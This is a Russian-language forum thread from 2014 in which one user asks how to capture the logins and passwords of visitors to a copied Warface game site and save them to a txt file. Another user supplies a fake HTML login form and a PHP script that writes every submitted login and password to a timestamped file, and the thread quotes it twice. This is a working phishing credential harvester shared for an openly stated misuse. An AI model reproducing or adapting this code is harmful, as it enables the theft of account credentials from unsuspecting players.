KAZAR 178 Опубликовано 9 апреля, 2014 Дорогие друзья в общем такая проблема делал у меня знакомый копирайт 1 сервака..... при входе..всех кто заходил в лк.... сохранялись в текстовом документе который лежал по ссылке (пример) http://сайт/ljqwergtqweqweqw.txt Не могу додуматься как сделать так же... подскажите ребят кто шарит с меня + Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
wester999 26 Опубликовано 9 апреля, 2014 Дорогие друзья в общем такая проблема делал у меня знакомый копирайт 1 сервака..... при входе..всех кто заходил в лк.... сохранялись в текстовом документе который лежал по ссылке (пример) http://сайт/ljqwergtqweqweqw.txt Не могу додуматься как сделать так же... подскажите ребят кто шарит с меня + этого лучше не делать Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
KAZAR 178 Опубликовано 9 апреля, 2014 этого лучше не делать та я не для сервера, решил сделать копирайт сайта вафрейс.... пошалить не много Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
wester999 26 Опубликовано 9 апреля, 2014 та я не для сервера, решил сделать копирайт сайта вафрейс.... пошалить не много я так и понял... Чтобы сделать запись login;password в txt файл, нужно сделать форму входа без кодировки, осуществить это можно с помощью php Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
KAZAR 178 Опубликовано 10 апреля, 2014 я так и понял... Чтобы сделать запись login;password в txt файл, нужно сделать форму входа без кодировки, осуществить это можно с помощью php и как ее сделать? я вообще не шарю Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Rubin 6 Опубликовано 10 апреля, 2014 и как ее сделать? я вообще не шарю По ищи в разделе " Услуги " и наверняка это работа будет стоить $, так как с php мало кто работает и бесплатно не будут помогать Это сугубо мое мнение, может и ошибаюсь Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
KAZAR 178 Опубликовано 10 апреля, 2014 По ищи в разделе " Услуги " и наверняка это работа будет стоить $, так как с php мало кто работает и бесплатно не будут помогать Это сугубо мое мнение, может и ошибаюсь я нашел в нете только 1 статью...и там простой пхп ... сделал все по гайду но все равно не работает Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Rubin 6 Опубликовано 10 апреля, 2014 я нашел в нете только 1 статью...и там простой пхп ... сделал все по гайду но все равно не работает Так и я тебе о чем говорю =))) не знаю, даже пока не заглядывал в php и не сталкивался, буду этим заниматься зимой, но думаю не так все легко это сделать даже если гайд есть =) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
wester999 26 Опубликовано 10 апреля, 2014 а как ты копирайт варфейса делаешь? ты его уже сделал? сайт есть? или как ты хочешь? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
KAZAR 178 Опубликовано 10 апреля, 2014 а как ты копирайт варфейса делаешь? ты его уже сделал? сайт есть? или как ты хочешь? Да сайт уже есть..... Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
wester999 26 Опубликовано 10 апреля, 2014 Ну ладно... 1. Тебе нужен index.htm / ну или как у тебя там индекс и на форму входа сделать вот такой код (добавить в index): <form method="POST" action="write.php"> <input type="text" name="login" size="20"> <input type="text" name="password" size="20"> <input type="submit" value="Войти" name="aaa"> </form> 2. Тебе нужно создать write.php и добавить в него код: <?php $t=''; if(isset($_POST['aaa'])){ foreach($_POST as $k=>$v){ $t.=$k." = ".$v."rn"; } $f=fopen(date('d-m-y,H-i-s'). ".txt","w+"); fwrite($f,$t); fclose($f); } Что этот код должен делать (его не проверял в деле, но должен работать, если что отпиши): То что вписываешь в форму login, password записывает в txt файл, файл будет иметь название по дате времени создания файла. и на каждый login;password свой файл... то есть зашел человек вписал логин, пароль и создался файл с названием того времени когда он это сделал и так каждый раз. 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
KAZAR 178 Опубликовано 10 апреля, 2014 Ну ладно... 1. Тебе нужен index.htm / ну или как у тебя там индекс и на форму входа сделать вот такой код (добавить в index): <form method="POST" action="write.php"> <input type="text" name="login" size="20"> <input type="text" name="password" size="20"> <input type="submit" value="Войти" name="aaa"> </form> 2. Тебе нужно создать write.php и добавить в него код: <?php $t=''; if(isset($_POST['aaa'])){ foreach($_POST as $k=>$v){ $t.=$k." = ".$v."rn"; } $f=fopen(date('d-m-y,H-i-s'). ".txt","w+"); fwrite($f,$t); fclose($f); } Что этот код должен делать (его не проверял в деле, но должен работать, если что отпиши): То что вписываешь в форму login, password записывает в txt файл, файл будет иметь название по дате времени создания файла. и на каждый login;password свой файл... то есть зашел человек вписал логин, пароль и создался файл с названием того времени когда он это сделал и так каждый раз. Спасибо но уже сделал.... и немного по другому Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты